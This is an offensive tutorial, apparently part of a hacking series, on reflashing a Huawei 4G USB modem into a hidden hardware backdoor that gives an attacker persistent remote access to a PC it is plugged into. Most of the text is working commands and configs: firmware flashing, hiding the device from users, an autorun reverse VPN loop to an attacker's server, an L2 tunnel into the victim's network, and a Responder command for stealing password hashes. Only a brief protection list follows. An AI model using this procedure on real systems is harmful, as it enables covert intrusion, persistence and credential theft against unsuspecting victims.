Evil modem. Establishing a foothold in the attacked system with a USB modem

If you have direct access to the target PC, you can create a permanent and continuous communication channel with it. All you need for this is a USB modem that must be slightly modified first. In this article, I will explain in detail how to deliver such an attack.

What if someone connects a special device to a computer left unattended, thus, gaining remote access to it from anywhere in the world? All the USB-based device emulation magic described earlier will be at the attacker’s disposal. But this time, the primary purpose of your malicious device is uninterrupted remote access, not attacks.

info

This article continues the series of publications describing practical hacking and attacking techniques involving makeshift devices that can be easily assembled at home. You will learn how to gain unauthorized access to protected information and how to protect your own data from such attacks. The previous article in this series was Evil Ethernet. BadUSB-ETH attack in detail.

Modern 4G modems (HiLink) are only slightly larger than a flash drive, and they run Linux. For instance, Android 2.3 / Linux 3.4.5 + VxWorks v6.8 for GSM. Such USB-powered devices are fully autonomous. Immediately after the connection to a PC, the modem OS is loaded (which takes a few seconds) and emulates this USB device as a network card.

The best hardware solution for the attack described in this article is a HiLink modem: it’s compact and equipped with a 4G module. For instance, the popular Huawei E3372h-153 that can be reflashed and is supported by a huge fan community.

Modern 4G modems are HiLink modems (i.e. the system identifies them as network cards). As a result, the OS running on the user’s PC conveniently interacts with the Internet via such a virtual Ethernet network. But the point is that the modem itself can be used to interact with the PC it’s plugged into. A fully functional OS runs inside this modem emulating a network card (similar to the BadUSB-ETH attack). Such a device can be used to establish a foothold on the compromised PC as shown below.

Information flows when a foothold is established via USB

To establish a foothold in similar circumstances, you can use a ready-made device called LAN Turtle, but it lacks an important feature: support for a 4G channel that is external to the attacked system

Implementation

The device is so well suited for remote access that it requires a minimum of modifications. Its main advantages are as follows:

no additional power is required;
covert connection: the device won’t be visible on the local network as it operates only inside the compromised PC; and
an autonomous 4G data transmission channel enables you to maintain access even inside isolated local networks.

For maximum efficiency, the device should be slightly modified: you have to reflash the modem. After this modification, the modem OS will automatically establish a VPN connection with the control server via the 4G network (an external channel), thus, providing stable network access to the PC the modem is plugged into. You can access the modem OS in one of the following ways:

telnet 192.168.8.1
adb connect 192.168.8.1:5555

To make further modifications, you have to enable ports for AT commands:

curl http://192.168.8.1/html/switchDebugMode.html
minicom -D /dev/ttyUSB0

After enabling the debug mode, the modem OS can be modified: you have to switch to the flash mode and flash the open firmware:

at^godload              # Switch to the flash mode. The modem will restart
sudo ./balong_flash -p /dev/ttyUSB0 E3372h-153_Update_22.200.15.00.00_M_AT_05.10_nv.exe

When the modem starts, it usually emulates a CD-ROM with drivers and an SD card. These functions must be disabled since the device needs only network emulation:

AT^NVWREX=50091,0,60,1 0 0 0 FF 00 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 A3 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0              # Don't switch to the CD-ROM mode at startup; RNDIS/CDC is enabled
AT^RESET    # Restart

Next, you have to modify the DHCP server so that the modem doesn’t announce itself as a gateway, and the routing table on the PC isn’t disrupted. The modem should connect as covertly as possible:

cat <<EE > /data/config
Interface br0
MinLease 30
Vendorid c0012
Address main
EnbSrv 1
Start 192.168.8.100
End 192.168.8.200
Option lease 86400
Option subnet 255.255.255.0
Address main end
EE

Now you have to copy the OpenVPN client with the driver and config to the modem. To avoid compilation, ready-made binaries can be downloaded from the 4PDA website:

adb push tun.ko /online/ovpn/
adb push openvpn /online/ovpn/
adb push vds.ovpn /online/ovpn/
cat <<EE > /data/vpn.sh
#!/system/bin/busybox sh
while :; do /online/ovpn/openvpn --config /online/ovpn/vds.ovpn --route-noexec; done
EE
chmod 700 /data/vpn.sh
busybox passwd
reboot

To make the reverse connection more reliable, VPN should be run in an infinite loop. Finally, you have to configure autorun for all this stuff and organize the routing of packets from the 4G network towards the target computer through the modem:

mount -o remount,rw /dev/block/mtdblock16
cat <<EE >> /system/etc/autorun.sh
/data/autorun.sh &
EE
cat <<EE > /data/autorun.sh
#!/system/bin/busybox sh
killall dhcps.real
cp /data/config /var/dhcp/dhcps/config
dhcps.real &
sleep 5
insmod /online/ovpn/tun.ko
/data/vpn.sh &
iptables -t nat -A POSTROUTING -o br0 -s 172.16.0.0/24 -j MASQUERADE
iptables -I INPUT 1 -i br0 -p tcp --dport 80 -j DROP
iptables -I FORWARD 2 -i br0 -o wan0 -j DROP
EE
chmod 700 /data/autorun.sh

Important: access to the 4G Internet from the target PC must be prohibited on the modem, and the web admin panel must be hidden. Now the modified modem can be used as a hardware backdoor.

Establishing a foothold

Your hardware backdoor can look something like this.

Connecting a backdoor device to the target PC

Looks pretty innocent, doesn’t it? Just a memory stick, an ordinary user will think. If the attacker can access a USB port on the target PC, chances are high that no one notices such a ‘strange’ device for a while. This grants the attacker long-term network access to the target via an autonomous channel. Note that remote connection is implemented via an external channel, and you no longer need the internal network to access the Internet. Your mobile network channel grants you guaranteed remote access.

Backdoor device provides remote access to the target PC

The smartphone and LAN Turtle are connected to the same VPN server that connects their network traffic. The 4G modem is reconfigured to pass traffic in an unusual reverse direction: through itself towards the computer (like a gateway). As a result, the attacker maintains direct network access to the compromised PC even at a distance of thousands of kilometers.

In this example, the phone and the laptop aren’t connected directly and operate in different networks. The laptop is connected to the local network via a cable without using the Internet, while the phone is connected over 4G. But when you add a route to the victim’s computer via a 4G modem, you gain remote access to this PC.

L2 access

This foothold creation technique provides network access only to the PC the modem is connected to. Further actions of the attacker require logical access (i.e. hacking the system and controlling it). In the case of success, this grants you both control over the attacked PC and the ability to advance deeper into the local network. To facilitate attacks on the target system, you may have to establish an L2VPN tunnel closer to the target.

Another VPN tunnel should be forwarded inside the existing one. The first VPN was used exclusively for communication with the lan_turtle device; while the second one will grant you the maximum possible network access to the target PC via the USB-emulated network.

To achieve this, you have to execute a few more commands inside the USB modem to create a VPN tunnel and place the newly-created virtual interface inside a network bridge with the USB interface:

./openvpn --config l2.ovpn --route-noexec
brctl addif br0 tap1
ifconfig tap1 0

The configuration file can be created directly inside the modem; its content should be as follows:

l2.ovpn

lclient
proto tcp
dev tap
remote 172.16.0.10 1194
<ca>
</ca>
<cert>
</cert>
<key>
</key>
keepalive 10 60
persist-key
persist-tun

The L2 VPN interface will have an IP address that’s not really needed since OpenVPN is already running. But you can discard it and then just place the interface inside the bridge. As a result, L2 packets from the compromised PC will go to the VPN interface. Not only will you get logical network access to the target PC, but you’ll see it as if you’ve plugged an Internet cable into it.

On the attacker’s side, all you need to do is connect to the modem, create a VPN tunnel, and then manually set its IP address from the network adapter subnet of the victim’s PC:

sudo openvpn --config lan_turtle.ovpn --route-noexec
sudo ifconfig tap0 192.168.8.200/24

The configuration file used to connect to lan_turtle and forward an L2VPN tunnel is as follows:

lan_turtle.ovpn

local 172.16.0.10
port 1194
proto tcp
dev tap
user nobody
<ca>
</ca>
<cert>
</cert>
<key>
</key>
<dh>
</dh>
server 192.168.9.0 255.255.255.0
keepalive 10 180
verb 3

Now the attacker gains full network access to the victim’s computer via a 4G modem. The L2 tunnel enables you to deliver attacks targeting link-layer protocols, as well as NetBIOS, using Responder and retrieve the user’s password hash:

responder -I tap0 -r -d -w -F

Protection

Since the attacker penetrates into the target PC through a USB port, the countermeasures are the same as in the case of BadUSB:

use specialized software solutions to block untrusted USB devices;
disable support for USB network cards in group policies;
inspect computers on a regular basis; and
control physical access to the PC.

Good luck!